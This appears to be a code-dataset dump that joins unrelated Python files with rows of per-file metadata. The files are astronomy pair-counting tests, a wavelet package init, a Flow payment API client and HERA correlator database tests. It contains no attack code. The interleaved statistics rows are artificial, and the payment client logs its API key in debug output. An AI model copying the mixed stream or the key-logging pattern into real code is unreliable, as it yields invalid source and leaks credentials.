pi_bins = np.array([0, 0.15])
test_result = pure_python_weighted_pairs(grid_points, grid_points,
rp_bins, pi_bins, weights1=np.ones((Npts, 1)), weights2=np.ones((Npts, 1)), period=period)
# wfunc = 9
weights2 = np.ones(Npts)
weights3 = np.ones(Npts)*3
weights = np.vstack([weights2, weights3]).T
result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights, weights2=weights, weight_func_id=9, approx_cell1_size=[rmax, rmax, rmax])
assert np.all(result == 3*test_result), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id10():
"""
Verify the behavior of a few wfunc-weighted counters by comparing pure python,
unmarked pairs to the returned result from a uniformly weighted set of points.
"""
Npts, Npts2 = 1000, 10
grid_points, rp_bins, period = retrieve_mock_data(Npts, Npts2, 1)
rmax = rp_bins.max()
pi_bins = np.array([0, 0.15])
test_result = pure_python_weighted_pairs(grid_points, grid_points,
rp_bins, pi_bins, weights1=np.ones((Npts, 1)), weights2=np.ones((Npts, 1)), period=period)
# wfunc = 10
weights2 = np.ones(Npts)
weights3 = np.ones(Npts)*3
weights = np.vstack([weights2, weights3]).T
result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights, weights2=weights, weight_func_id=10, approx_cell1_size=[rmax, rmax, rmax])
assert np.all(result == 0), error_msg
weights2 = np.ones(Npts)
weights3 = -np.ones(Npts)*3
weights = np.vstack([weights2, weights3]).T
result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights, weights2=weights, weight_func_id=10, approx_cell1_size=[rmax, rmax, rmax])
assert np.all(result == -3*test_result), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id11():
"""
weight_func_id=11
"""
Npts, Npts2 = 1000, 10
grid_points, rp_bins, period = retrieve_mock_data(Npts, Npts2, 1)
pi_bins = np.array([0, 0.15])
weights1 = np.tile((1., 0.), Npts).reshape((Npts, 2))
weights2 = np.ones(Npts*2).reshape((Npts, 2))
result1 = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights1, weights2=weights2, weight_func_id=11)
result2 = npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period)
assert np.all(result1 == result2)
weights2 = np.tile((1., 2.), Npts).reshape((Npts, 2))
result3 = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights1, weights2=weights2, weight_func_id=11)
assert np.all(result3 == 2*result2)
| 36.515556 | 99 | 0.702532 | 2,448 | 16,432 | 4.468137 | 0.09518 | 0.032364 | 0.037301 | 0.049735 | 0.838819 | 0.828396 | 0.795118 | 0.781313 | 0.765771 | 0.764034 | 0 | 0.039073 | 0.188535 | 16,432 | 449 | 100 | 36.596882 | 0.781236 | 0.140093 | 0 | 0.609665 | 0 | 0 | 0.027238 | 0.004913 | 0 | 0 | 0 | 0 | 0.066915 | 1 | 0.05948 | false | 0 | 0.037175 | 0 | 0.100372 | 0.003717 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6f0c7df8e8fe2f993ea5e7f91edeae403f6463af | 35 | py | Python | gmw/__init__.py | mattbit/gmw | 5cc215826e78043eeb11af96ea8f43471177d9f1 | [
"MIT"
] | 1 | 2021-02-28T03:21:51.000Z | 2021-02-28T03:21:51.000Z | gmw/__init__.py | mattbit/gmw | 5cc215826e78043eeb11af96ea8f43471177d9f1 | [
"MIT"
] | null | null | null | gmw/__init__.py | mattbit/gmw | 5cc215826e78043eeb11af96ea8f43471177d9f1 | [
"MIT"
] | null | null | null | from .wavelets import MorseWavelet
| 17.5 | 34 | 0.857143 | 4 | 35 | 7.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6f4aab55daf450a351144367c40c39dba8361d90 | 6,512 | py | Python | pyflowcl/Payment.py | mariofix/pyflowcl | 853ba83b892cc0c5cd90e81eb17ef435a73100e4 | [
"MIT"
] | 2 | 2020-12-07T20:50:30.000Z | 2021-02-08T23:31:07.000Z | pyflowcl/Payment.py | mariofix/pyflowcl | 853ba83b892cc0c5cd90e81eb17ef435a73100e4 | [
"MIT"
] | 6 | 2020-08-31T03:11:21.000Z | 2022-01-17T02:54:04.000Z | pyflowcl/Payment.py | mariofix/pyflowcl | 853ba83b892cc0c5cd90e81eb17ef435a73100e4 | [
"MIT"
] | null | null | null | from dataclasses import asdict
from typing import Any, Dict, Union, cast
from .Clients import ApiClient
import logging
from .models import *
def getStatus(
apiclient: ApiClient,
token: str,
) -> Union[PaymentStatus, Error,]:
"""Obtiene el estado de un pago previamente creado, el parametro token
hace referencia a notification id, el cual se recibe luego de procesado
un pago
"""
url = f"{apiclient.api_url}/payment/getStatus"
params: Dict[str, Any] = {"apiKey": apiclient.api_key, "token": token}
signature = apiclient.make_signature(params)
params["s"] = signature
logging.debug("Before Request:" + str(params))
response = apiclient.get(url, params)
if response.status_code == 200:
return PaymentStatus.from_dict(cast(Dict[str, Any], response.json()))
if response.status_code == 400:
return Error.from_dict(cast(Dict[str, Any], response.json()))
if response.status_code == 401:
return Error.from_dict(cast(Dict[str, Any], response.json()))
else:
raise Exception(response=response)
def getStatusByCommerceId(
apiclient: ApiClient,
commerceId: str,
) -> Union[PaymentStatus, Error,]:
"""Obtiene el estado de un pago previamente creado, el parametro token
hace referencia a notification id, el cual se recibe luego de procesado
un pago
"""
url = f"{apiclient.api_url}/payment/getStatusByCommerceId"
params: Dict[str, Any] = {"apiKey": apiclient.api_key, "commerceId": commerceId}
signature = apiclient.make_signature(params)
params["s"] = signature
logging.debug("Before Request:" + str(params))
response = apiclient.get(url, params)
if response.status_code == 200:
return PaymentStatus.from_dict(cast(Dict[str, Any], response.json()))
if response.status_code == 400:
return Error.from_dict(cast(Dict[str, Any], response.json()))
if response.status_code == 401:
return Error.from_dict(cast(Dict[str, Any], response.json()))
else:
raise Exception(response=response)
def getStatusByFlowOrder(
apiclient: ApiClient,
flowOrder: int,
) -> Union[PaymentStatus, Error,]:
"""Obtiene el estado de un pago previamente creado, el parametro token
hace referencia a notification id, el cual se recibe luego de procesado
un pago
"""
url = f"{apiclient.api_url}/payment/getStatusByFlowOrder"
params: Dict[str, Any] = {"apiKey": apiclient.api_key, "flowOrder": flowOrder}
signature = apiclient.make_signature(params)
params["s"] = signature
logging.debug("Before Request:" + str(params))
response = apiclient.get(url, params)
if response.status_code == 200:
return PaymentStatus.from_dict(cast(Dict[str, Any], response.json()))
if response.status_code == 400:
return Error.from_dict(cast(Dict[str, Any], response.json()))
if response.status_code == 401:
return Error.from_dict(cast(Dict[str, Any], response.json()))
else:
raise Exception(response=response)
def getPayments(
apiclient: ApiClient, payment_info: Dict[str, Any]
) -> Union[PaymentList, Error,]:
"""
Este método permite obtener la lista paginada de pagos recibidos en
un día.Los objetos pagos de la lista tienen la misma estructura de
los retornados en los servicios payment/getStatus
"""
url = f"{apiclient.api_url}/payment/getPayments"
payment_info["apiKey"] = apiclient.api_key
signature = apiclient.make_signature(payment_info)
payment_info["s"] = signature
logging.debug("Before Request:" + str(payment_info))
response = apiclient.get(url, payment_info)
if response.status_code == 200:
return PaymentList.from_dict(cast(Dict[str, Any], response.json()))
if response.status_code == 400:
return Error.from_dict(cast(Dict[str, Any], response.json()))
if response.status_code == 401:
return Error.from_dict(cast(Dict[str, Any], response.json()))
else:
raise Exception(response=response)
def create(
apiclient: ApiClient, payment_data: Dict[str, Any]
) -> Union[PaymentResponse, Error,]:
"""
Este método permite crear una orden de pago a Flow y recibe como respuesta
la URL para redirigir el browser del pagador y el token que identifica la
transacción. La url de redirección se debe formar concatenando los valores
recibidos en la respuesta de la siguiente forma:
url + "?token=" +token
Una vez que el pagador efectúe el pago, Flow notificará el resultado a la
página del comercio que se envió en el parámetro urlConfirmation.
"""
url = f"{apiclient.api_url}/payment/create"
payment = PaymentRequest.from_dict(payment_data)
if payment.apiKey is None:
payment.apiKey = apiclient.api_key
payment.s = apiclient.make_signature(asdict(payment))
logging.debug("Before Request:" + str(payment))
response = apiclient.post(url, asdict(payment))
if response.status_code == 200:
return PaymentResponse.from_dict(cast(Dict[str, Any], response.json()))
if response.status_code == 400:
return Error.from_dict(cast(Dict[str, Any], response.json()))
if response.status_code == 401:
return Error.from_dict(cast(Dict[str, Any], response.json()))
else:
raise Exception(response=response)
def createEmail(
apiclient: ApiClient, payment_data: Dict[str, Any]
) -> Union[PaymentResponse, Error,]:
"""
Permite generar un cobro por email. Flow emite un email al pagador
que contiene la información de la Orden de pago y el link de pago
correspondiente. Una vez que el pagador efectúe el pago, Flow
notificará el resultado a la página del comercio que se envió en el
parámetro urlConfirmation.
"""
url = f"{apiclient.api_url}/payment/createEmail"
payment = PaymentRequestEmail.from_dict(payment_data)
if payment.apiKey is None:
payment.apiKey = apiclient.api_key
payment.s = apiclient.make_signature(asdict(payment))
logging.debug("Before Request:" + str(payment))
response = apiclient.post(url, asdict(payment))
if response.status_code == 200:
return PaymentResponse.from_dict(cast(Dict[str, Any], response.json()))
if response.status_code == 400:
return Error.from_dict(cast(Dict[str, Any], response.json()))
if response.status_code == 401:
return Error.from_dict(cast(Dict[str, Any], response.json()))
else:
raise Exception(response=response)
| 37 | 84 | 0.694564 | 842 | 6,512 | 5.293349 | 0.166271 | 0.037694 | 0.053848 | 0.080772 | 0.740857 | 0.740857 | 0.726946 | 0.71842 | 0.693516 | 0.693516 | 0 | 0.010309 | 0.195639 | 6,512 | 175 | 85 | 37.211429 | 0.840588 | 0.208231 | 0 | 0.705357 | 0 | 0 | 0.077476 | 0.049121 | 0 | 0 | 0 | 0.011429 | 0 | 1 | 0.053571 | false | 0 | 0.044643 | 0 | 0.258929 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6f6f9df33c0be06e2498a7f7fffffd1be19c129a | 92,164 | py | Python | hera_mc/tests/test_correlator.py | HERA-Team/hera_mc | bc4d57e5e9c5ac8cd2a5b1a356de1742c2f70d8e | [
"BSD-2-Clause"
] | 4 | 2018-01-28T06:58:00.000Z | 2020-04-16T11:19:38.000Z | hera_mc/tests/test_correlator.py | HERA-Team/hera_mc | bc4d57e5e9c5ac8cd2a5b1a356de1742c2f70d8e | [
"BSD-2-Clause"
] | 474 | 2016-10-26T17:29:54.000Z | 2022-02-15T21:51:52.000Z | hera_mc/tests/test_correlator.py | HERA-Team/hera_mc | bc4d57e5e9c5ac8cd2a5b1a356de1742c2f70d8e | [
"BSD-2-Clause"
] | 2 | 2016-11-15T14:34:55.000Z | 2020-11-02T08:07:19.000Z | # -*- mode: python; coding: utf-8 -*-
# Copyright 2018 the HERA Collaboration
# Licensed under the 2-clause BSD license.
"""Testing for `hera_mc.correlator`."""
import os
import copy
import time
import datetime
import hashlib
from math import floor
import pytest
import yaml
import numpy as np
from astropy.time import Time, TimeDelta
from hera_mc import mc, cm_partconnect
import hera_mc.correlator as corr
from hera_mc.data import DATA_PATH
from ..tests import onsite, checkWarnings, requires_redis, TEST_DEFAULT_REDIS_HOST
@pytest.fixture(scope='module')
def corrcommand():
return {
'taking_data': {'state': True,
'timestamp': Time(1512770942, format='unix')},
'phase_switching': {'state': False,
'timestamp': Time(1512770944, format='unix')},
'noise_diode': {'state': True,
'timestamp': Time(1512770946, format='unix')},
}
@pytest.fixture(scope='module')
def corrstate_nonetime():
return {'taking_data': {'state': False, 'timestamp': None}}
@pytest.fixture(scope='module')
def feng_config():
config_file = os.path.join(DATA_PATH, 'test_data',
'hera_feng_config_example.yaml')
with open(config_file, 'r') as stream:
config = yaml.safe_load(stream)
return config_file, config
@pytest.fixture(scope='module')
def corr_config():
config_file = os.path.join(DATA_PATH, 'test_data',
'corr_config_example.yaml')
with open(config_file, 'r') as stream:
config = yaml.safe_load(stream)
return config_file, config
@pytest.fixture(scope='module')
def corr_config_dict(corr_config):
return {'time': Time(1230372020, format='gps'),
'hash': 'testhash', 'config': corr_config[1]}
@pytest.fixture(scope='module')
def init_args():
return ("Namespace(config_file=None, eth=True, initialize=True, "
+ "mansync=False, noise=False, program=False, "
+ f"redishost='{TEST_DEFAULT_REDIS_HOST}', sync=True, tvg=False)")
@pytest.fixture(scope='module')
def snapversion(corr_config, init_args):
return {
'udpSender:hera_node_keep_alive.py': {
'timestamp': datetime.datetime(2019, 4, 2, 19, 7, 17, 438357),
'version': '0.0.1-1eaa49ea'},
'hera_corr_f:hera_snap_redis_monitor.py': {
'timestamp': datetime.datetime(2019, 4, 2, 19, 7, 14, 317679),
'version': '0.0.1-3c7fdaf6'},
'udpSender:hera_node_cmd_check.py': {
'timestamp': datetime.datetime(2019, 4, 2, 19, 7, 17, 631614),
'version': '0.0.1-1eaa49ea'},
'udpSender:hera_node_receiver.py': {
'timestamp': datetime.datetime(2019, 4, 2, 19, 7, 16, 555086),
'version': '0.0.1-1eaa49ea'},
'hera_corr_cm': {
'timestamp': datetime.datetime(2019, 4, 2, 19, 7, 17, 644984),
'version': '0.0.1-11a573c9'},
'snap': {'config': corr_config[1],
'config_md5': 'testhash',
'config_timestamp': datetime.datetime(
2019, 2, 18, 5, 41, 29, 376363),
'init_args': init_args,
'timestamp':
datetime.datetime(2019, 3, 27, 8, 28, 25, 806626),
'version': '0.0.1-3c7fdaf6'}}
@pytest.fixture(scope='module')
def snapstatus():
return {
'heraNode700Snap0': {'last_programmed':
datetime.datetime(2016, 1, 10, 23, 16, 3),
'pmb_alert': False,
'pps_count': 595687,
'serial': 'SNPA000700',
'temp': 57.984954833984375,
'timestamp': datetime.datetime(
2016, 1, 5, 20, 44, 52, 741137),
'uptime': 595686},
'heraNode701Snap3': {'last_programmed':
datetime.datetime(2016, 1, 10, 23, 16, 3),
'pmb_alert': False,
'pps_count': 595699,
'serial': 'SNPD000703',
'temp': 59.323028564453125,
'timestamp': datetime.datetime(
2016, 1, 5, 20, 44, 52, 739322),
'uptime': 595699}}
@pytest.fixture(scope='module')
def snapstatus_none():
return {
'heraNode700Snap0': {'last_programmed': 'None',
'pmb_alert': 'None',
'pps_count': 'None',
'serial': 'None',
'temp': 'None',
'timestamp': datetime.datetime(
2016, 1, 5, 20, 44, 52, 741137),
'uptime': 'None'},
'heraNode701Snap3': {'last_programmed':
datetime.datetime(2016, 1, 5, 20, 44, 52, 741137),
'pmb_alert': False,
'pps_count': 595699,
'serial': 'SNPD000703',
'temp': 59.323028564453125,
'timestamp': 'None',
'uptime': 595699}}
@pytest.fixture(scope='module')
def antstatus():
return {
'4:e': {'timestamp': datetime.datetime(2016, 1, 5, 20, 44, 52, 739322),
'f_host': 'heraNode700Snap0',
'host_ant_id': 3,
'adc_mean': -0.5308380126953125,
'adc_rms': 3.0134560488579285,
'adc_power': 9.080917358398438,
'pam_atten': 0,
'pam_power': -13.349140985640002,
'pam_voltage': 10.248,
'pam_current': 0.6541,
'pam_id': [112, 217, 32, 59, 1, 0, 0, 14],
'fem_voltage': 6.496,
'fem_current': 0.5627000000000001,
'fem_id': [0, 168, 19, 212, 51, 51, 255, 255],
'fem_switch': 'antenna',
'fem_e_lna_power': True,
'fem_n_lna_power': True,
'fem_imu_theta': 1.3621702512711602,
'fem_imu_phi': 30.762719534238915,
'fem_temp': 26.327341308593752,
'fft_of': False,
'eq_coeffs': (np.zeros((1024)) + 56.921875).tolist(),
'histogram': [np.arange(-128, 182, dtype=np.int_).tolist(),
(np.zeros((256)) + 10).tolist()]},
'31:n': {'timestamp':
datetime.datetime(2016, 1, 5, 20, 44, 52, 739322),
'f_host': 'heraNode4Snap3',
'host_ant_id': 7,
'adc_mean': -0.4805450439453125,
'adc_rms': 16.495319974304454,
'adc_power': 272.0955810546875,
'pam_atten': 0,
'pam_power': -32.03119784856,
'pam_voltage': 10.268,
'pam_current': 0.6695000000000001,
'pam_id': [112, 84, 143, 59, 1, 0, 0, 242],
'fem_voltage': float('nan'),
'fem_current': float('nan'),
'fem_id': [0, 168, 19, 212, 51, 51, 255, 255],
'fem_switch': 'noise',
'fem_e_lna_power': False,
'fem_n_lna_power': False,
'fem_imu_theta': 1.3621702512711602,
'fem_imu_phi': 30.762719534238915,
'fem_temp': 27.828854980468755,
'fft_of': True,
'eq_coeffs': (np.zeros((1024)) + 73.46875).tolist(),
'histogram': [np.arange(-128, 182, dtype=np.int_).tolist(),
(np.zeros((256)) + 12).tolist()]}}
@pytest.fixture(scope='module')
def antstatus_none():
return {
'4:e': {'timestamp': datetime.datetime(2016, 1, 5, 20, 44, 52, 739322),
'f_host': 'None',
'host_ant_id': 'None',
'adc_mean': 'None',
'adc_rms': 'None',
'adc_power': 'None',
'pam_atten': 'None',
'pam_power': 'None',
'pam_voltage': 'None',
'pam_current': 'None',
'pam_id': 'None',
'fem_voltage': 'None',
'fem_current': 'None',
'fem_id': 'None',
'fem_switch': 'None',
'fem_e_lna_power': 'None',
'fem_n_lna_power': 'None',
'fem_imu_theta': 'None',
'fem_imu_phi': 'None',
'fem_temp': 'None',
'fft_of': 'None',
'eq_coeffs': 'None',
'histogram': 'None'},
'31:n': {'timestamp':
datetime.datetime(2016, 1, 5, 20, 44, 52, 739322),
'f_host': 'None',
'host_ant_id': 'None',
'adc_mean': 'None',
'adc_rms': 'None',
'adc_power': 'None',
'pam_atten': 'None',
'pam_power': 'None',
'pam_voltage': 'None',
'pam_current': 'None',
'pam_id': 'None',
'fem_voltage': float('nan'),
'fem_current': float('nan'),
'fem_id': 'None',
'fem_switch': 'Unknown mode',
'fem_e_lna_power': 'None',
'fem_n_lna_power': 'None',
'fem_imu_theta': 'None',
'fem_imu_phi': 'None',
'fem_temp': 'None',
'fft_of': 'None',
'eq_coeffs': 'None',
'histogram': 'None'}}
def test_py3_hashing(feng_config):
# make sure I get the same answer as with python 2.7 & no explicit encoding
# (like the correlator)
py27_hash = '3b03414da0abe738aae071cccb911377'
with open(feng_config[0], 'r') as fh:
config_string = fh.read().encode('utf-8')
config_hash = hashlib.md5(config_string).hexdigest()
assert py27_hash == config_hash
def test_add_corr_command_state(mcsession):
test_session = mcsession
t1 = Time('2016-01-10 01:15:23', scale='utc')
test_session.add_correlator_control_state(t1, 'taking_data', True)
expected = corr.CorrelatorControlState(
time=int(floor(t1.gps)), state_type='taking_data', state=True)
result = test_session.get_correlator_control_state(
starttime=t1 - TimeDelta(3.0, format='sec'))
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
test_session.add_correlator_control_state(t1, 'phase_switching', False)
result = test_session.get_correlator_control_state(
starttime=t1 - TimeDelta(3.0, format='sec'), state_type='taking_data')
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_correlator_control_state(
state_type='taking_data')
assert len(result_most_recent), 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
expected = corr.CorrelatorControlState(
time=int(floor(t1.gps)), state_type='phase_switching', state=False)
result = test_session.get_correlator_control_state(
starttime=t1 - TimeDelta(3.0, format='sec'),
state_type='phase_switching')
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_correlator_control_state(
state_type='phase_switching')
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
result = test_session.get_correlator_control_state(
starttime=t1 - TimeDelta(3.0, format='sec'), stoptime=t1)
assert len(result) == 2
result_most_recent = test_session.get_correlator_control_state()
assert len(result) == 2
result = test_session.get_correlator_control_state(
starttime=t1 + TimeDelta(200.0, format='sec'))
assert result == []
def test_add_correlator_control_state_from_corrcm(mcsession, corrcommand):
test_session = mcsession
corr_state_obj_list = \
test_session.add_correlator_control_state_from_corrcm(
corr_state_dict=corrcommand, testing=True)
for obj in corr_state_obj_list:
test_session.add(obj)
t1 = Time(1512770942.726777, format='unix')
result = test_session.get_correlator_control_state(
starttime=t1 - TimeDelta(3.0, format='sec'))
expected = corr.CorrelatorControlState(
time=int(floor(t1.gps)), state_type='taking_data', state=True)
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
result_most_recent = test_session.get_correlator_control_state(
state_type='taking_data')
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(expected)
result_most_recent = test_session.get_correlator_control_state()
assert len(result_most_recent) == 1
assert result_most_recent[0].state_type == 'noise_diode'
result = test_session.get_correlator_control_state(
starttime=t1 - TimeDelta(3.0, format='sec'),
stoptime=t1 + TimeDelta(5.0, format='sec'))
assert len(result) == 3
def test_add_correlator_control_state_from_corrcm_nonetime_noprior(
mcsession, corrstate_nonetime):
test_session = mcsession
test_session.add_correlator_control_state_from_corrcm(
corr_state_dict=corrstate_nonetime)
result = test_session.get_correlator_control_state(most_recent=True)
res_time = result[0].time
assert Time.now().gps - res_time < 2.
expected = corr.CorrelatorControlState(
time=res_time, state_type='taking_data', state=False)
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
def test_add_correlator_control_state_from_corrcm_nonetime_priortrue(
mcsession, corrcommand, corrstate_nonetime):
test_session = mcsession
test_session.add_correlator_control_state_from_corrcm(
corr_state_dict=corrcommand)
test_session.add_correlator_control_state_from_corrcm(
corr_state_dict=corrstate_nonetime)
result = test_session.get_correlator_control_state(most_recent=True)
res_time = result[0].time
assert Time.now().gps - res_time < 2.
expected = corr.CorrelatorControlState(
time=res_time, state_type='taking_data', state=False)
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
def test_add_correlator_control_state_from_corrcm_nonetime_priorfalse(
mcsession, corrstate_nonetime):
test_session = mcsession
not_taking_data_state_dict = {'taking_data': {
'state': False, 'timestamp': Time(1512770942, format='unix')}}
corr_state_obj_list = \
test_session.add_correlator_control_state_from_corrcm(
corr_state_dict=not_taking_data_state_dict)
corr_state_obj_list = \
test_session.add_correlator_control_state_from_corrcm(
corr_state_dict=corrstate_nonetime, testing=True)
test_session._insert_ignoring_duplicates(
corr.CorrelatorControlState, corr_state_obj_list)
result = test_session.get_correlator_control_state(most_recent=True)
expected = corr.CorrelatorControlState(
time=Time(1512770942, format='unix').gps, state_type='taking_data',
state=False)
assert len(result) == 1
result = result[0]
assert result.isclose(expected)
def test_control_state_errors(mcsession):
test_session = mcsession
pytest.raises(ValueError, test_session.add_correlator_control_state,
'foo', 'taking_data', True)
t1 = Time('2016-01-10 01:15:23', scale='utc')
pytest.raises(ValueError, test_session.add_correlator_control_state,
t1, 'foo', True)
bad_corr_state_dict = {'taking_data': {'state': True, 'timestamp': None}}
pytest.raises(ValueError,
test_session.add_correlator_control_state_from_corrcm,
corr_state_dict=bad_corr_state_dict, testing=True)
bad_corr_state_dict = {'phase_switching': {'state': False,
'timestamp': None}}
pytest.raises(ValueError,
test_session.add_correlator_control_state_from_corrcm,
corr_state_dict=bad_corr_state_dict, testing=True)
@requires_redis
def test_add_corr_control_state_from_corrcm(mcsession):
test_session = mcsession
test_session.add_correlator_control_state_from_corrcm()
result = test_session.get_correlator_control_state(
state_type='taking_data', most_recent=True)
assert len(result) == 1
result = test_session.get_correlator_control_state(
state_type='phase_switching', most_recent=True)
assert len(result) == 1
result = test_session.get_correlator_control_state(
state_type='noise_diode', most_recent=True)
assert len(result) == 1
def test_add_corr_config(mcsession, corr_config):
test_session = mcsession
t1 = Time('2016-01-10 01:15:23', scale='utc')
t2 = t1 + TimeDelta(120.0, format='sec')
config_hash = 'testhash'
test_session.add_correlator_config_file(config_hash, corr_config[0])
test_session.commit()
test_session.add_correlator_config_status(t1, config_hash)
test_session.commit()
file_expected = corr.CorrelatorConfigFile(config_hash=config_hash,
filename=corr_config[0])
status_expected = corr.CorrelatorConfigStatus(time=int(floor(t1.gps)),
config_hash=config_hash)
file_result = test_session.get_correlator_config_file(config_hash=config_hash)
assert len(file_result) == 1
file_result = file_result[0]
assert file_result.isclose(file_expected)
# check you get the same thing using time filtering
file_result, time_list = test_session.get_correlator_config_file()
assert len(file_result) == 1
file_result = file_result[0]
assert file_result.isclose(file_expected)
status_result = test_session.get_correlator_config_status(
starttime=t1 - TimeDelta(3.0, format='sec'))
assert len(status_result) == 1
status_result = status_result[0]
assert status_result.isclose(status_expected)
config_hash2 = 'testhash2'
test_session.add_correlator_config_file(config_hash2, corr_config[0])
test_session.commit()
test_session.add_correlator_config_status(t2, config_hash2)
test_session.commit()
result = test_session.get_correlator_config_status(
starttime=t1 - TimeDelta(3.0, format='sec'), config_hash=config_hash)
assert len(result) == 1
result = result[0]
assert result.isclose(status_expected)
result_most_recent = test_session.get_correlator_config_status(
config_hash=config_hash)
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(status_expected)
status_expected = corr.CorrelatorConfigStatus(
time=int(floor(t2.gps)), config_hash=config_hash2)
result = test_session.get_correlator_config_status(
starttime=t1 - TimeDelta(3.0, format='sec'), config_hash=config_hash2)
assert len(result) == 1
result = result[0]
assert result.isclose(status_expected)
result_most_recent = test_session.get_correlator_config_status(
config_hash=config_hash2)
assert len(result_most_recent) == 1
result_most_recent = result_most_recent[0]
assert result_most_recent.isclose(status_expected)
result = test_session.get_correlator_config_status(
starttime=t1 - TimeDelta(3.0, format='sec'), stoptime=t2)
assert len(result) == 2
result_most_recent = test_session.get_correlator_config_status()
assert len(result_most_recent) == 1
result = test_session.get_correlator_config_status(
starttime=t1 + TimeDelta(200.0, format='sec'))
assert result == []
@pytest.mark.parametrize("rosetta_exists", (True, False))
def test_add_correlator_config_from_corrcm(mcsession, corr_config_dict, rosetta_exists):
test_session = mcsession
corr_config_dict_use = copy.deepcopy(corr_config_dict)
if not rosetta_exists:
# use an earlier time before the part_rosetta entries start
corr_config_dict_use["time"] = Time(1512770942, format='unix')
corr_config_list = test_session.add_correlator_config_from_corrcm(
config_state_dict=corr_config_dict_use, testing=True)
for obj in corr_config_list:
test_session.add(obj)
test_session.commit()
t1 = corr_config_dict_use["time"]
status_result = test_session.get_correlator_config_status(
starttime=t1 - TimeDelta(3.0, format='sec'))
assert len(status_result) == 1
file_result = test_session.get_correlator_config_file(
config_hash=status_result[0].config_hash)
config_filename = 'correlator_config_' + str(int(floor(t1.gps))) + '.yaml'
file_expected = corr.CorrelatorConfigFile(config_hash='testhash',
filename=config_filename)
assert len(file_result) == 1
file_result = file_result[0]
assert file_result.isclose(file_expected)
# check you get the same thing using time filtering
file_result, time_list = test_session.get_correlator_config_file(
starttime=t1 - TimeDelta(3.0, format='sec')
)
assert len(file_result) == 1
file_result = file_result[0]
assert file_result.isclose(file_expected)
status_expected = corr.CorrelatorConfigStatus(time=int(floor(t1.gps)),
config_hash='testhash')
assert len(status_result) == 1
status_result = status_result[0]
assert status_result.isclose(status_expected)
config_params_result = test_session.get_correlator_config_params(
config_hash=status_result.config_hash
)
config_param_dict = {
'fft_shift': 15086,
'fpgfile': "redis:snap_fengine_2020-07-16_1253.fpg",
'dest_port': 8511,
'log_walsh_step_size': 3,
'walsh_order': 32,
'walsh_delay': 600,
'fengines': ','.join(
["heraNode700Snap0", "heraNode700Snap1", "heraNode700Snap2", "heraNode700Snap3"]
),
'xengines': ','.join([str(xeng) for xeng in [0, 1]]),
'x0:chan_range': ','.join([str(chan) for chan in [1536, 1920]]),
'x1:chan_range': ','.join([str(chan) for chan in [1920, 2304]]),
'x0:even:ip': '10.80.40.197',
'x0:even:mac': '2207786215621',
'x0:odd:ip': '10.80.40.206',
'x0:odd:mac': '2207786215630',
'x1:even:ip': '10.80.40.229',
'x1:even:mac': '2207786215653',
'x1:odd:ip': '10.80.40.238',
'x1:odd:mac': '2207786215662',
}
assert len(config_params_result) == len(config_param_dict)
# check that using the time options works too
config_params_result2, time_list = test_session.get_correlator_config_params(
starttime=t1 - TimeDelta(3.0, format='sec')
)
assert len(config_params_result2) == len(config_param_dict)
assert len(time_list) == len(config_param_dict)
for time_obj in time_list[1:]:
assert time_obj == time_list[0]
for param, val in config_param_dict.items():
config_params_result = test_session.get_correlator_config_params(
config_hash=status_result.config_hash,
parameter=param,
)
config_params_expected = corr.CorrelatorConfigParams(
config_hash='testhash',
parameter=param,
value=str(val),
)
assert len(config_params_result) == 1
config_params_result = config_params_result[0]
assert config_params_result.isclose(config_params_expected)
# check that using the time options works too
config_params_result, time_list = test_session.get_correlator_config_params(
starttime=t1 - TimeDelta(3.0, format='sec'),
parameter=param,
)
assert len(config_params_result) == 1
config_params_result = config_params_result[0]
assert config_params_result.isclose(config_params_expected)
config_active_snaps_result = test_session.get_correlator_config_active_snaps(
config_hash=status_result.config_hash,
)
active_snaps_list = [
"heraNode700Snap0", "heraNode700Snap1", "heraNode700Snap2", "heraNode700Snap3"
]
assert len(config_active_snaps_result) == len(active_snaps_list)
# check that we can also get the nodes & snap loc nums
config_active_snaps_result, node_list, snap_loc_list = (
test_session.get_correlator_config_active_snaps(
